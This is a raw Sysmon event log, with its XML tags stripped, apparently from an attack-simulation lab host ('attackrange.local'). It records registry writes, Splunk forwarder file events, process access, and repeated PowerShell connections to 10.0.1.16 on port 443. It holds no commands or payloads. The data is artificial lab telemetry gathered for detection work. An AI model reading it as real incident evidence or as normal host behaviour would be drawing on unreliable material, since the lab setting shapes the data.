13241300x800000000000000036496101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a969-0xdbee0b97) 13241300x800000000000000036496100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0x3db27397) 354300x800000000000000036496114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:46.790{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50367-false10.0.1.12-8000- 354300x800000000000000036496113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:46.529{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50366-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:16.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D16823F269684F8ABFE92DF26F1307,SHA256=EA4CB27571B3B277DFD4744C91C892DCA828E912384A4152B86029FDD0412AF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:17.428{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A546064DE0728B27530526A689F7DA4A,SHA256=4B5A6795874984DCDB14A06215CA02FDB3F415276E80060B0766D18BC4365D90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:18.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01BF8AA9831F50F325D255F9C6289953,SHA256=F2DFD988136675765C00CEBA613FF591A0DFF6DDEC0A543B2F488EA7F49151F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:19.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CD19BD66B177F80763464EC9F664C10,SHA256=1F0019250DACFFD3519270DB114E376B43BF34BE0B41A08A2C8CD867D26828BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:20.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E7D6C7071312221135FE889C8207FC1,SHA256=09893F29133DBDCA38CE54EE7D4D9291ADFE98775B0712E24553F27A22E9DC6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:21.975{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8A39EECEE6F4E1CC15EAB57C8D08156D,SHA256=843A12E888C4441AC85117716813DCC2E280CE65BB5FD16FAD7733A3A88EB1D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:21.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F580B1467B0810F7C20C326475BFE3,SHA256=CF444D407B3BA1529B94C118DCA80EA90778FBAA5232514DD2E0034856611F71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:22.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A17D39632CB41DBFA7144C16981B90B,SHA256=20D927EBA3DC89AC151DEBFD2F7203DACBF566CD36766F4DC020A873BF62645E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:52.823{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50369-false10.0.1.12-8000- 354300x800000000000000036496121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:52.539{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50368-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:23.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1569EC527D68A7A190200450201F8BBC,SHA256=1C09E530AF28251032AA2D59F113B6EA679E580F1B9678C824CA9D4872B33F96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:23.193{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8197EC6C5CFCFCAF0E57F182B1FC2705,SHA256=9D0B9DD68769F5257C3B385608D9C23642B213CC4151EF97A7BE911720C57F38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.992{B81B27B7-9F40-6140-4E56-04000000C801}49843380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.825{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=846FD6B9F93A34FDD872CAE1BA552F2F,SHA256=39B7E341ABCD439387CF0DD7067D5338E0D854D641329F5E7501E5302E003A8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.327{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.323{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.323{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.293{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=272E6A6F5A50BB05AF074334FEA79117,SHA256=260BA69647A066EC8EEAA9FC0A5C35951DAFCB59111D1786066BFC36F31E41A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.628{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566C3C5582B6DB0F07FB58DA1E2F6A4E,SHA256=5786F6A9CDC7F48D6A9CF4E56AB4BC4A7484389B71837A43A94FBD3F7C550155,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=545ABA38114B2CFC5B5F4D126A04B556,SHA256=F18625850F481B434E69001BD1DE9FE7E7438D28BAFEC261383FD783120F2368,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E48885003619F6D03B453579832167BE,SHA256=99A43D9A184034EFE7A059FA5DC69BCCD638ABC8AF08B6998C5991E486F53AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:26.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=560148F53DADB3908DAFD141EC7F8739,SHA256=6D895FE11A78C989FF48B3D60E58133DDF9140EAF7B733B74FC536CE4E00E6A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:56.554{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50370-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 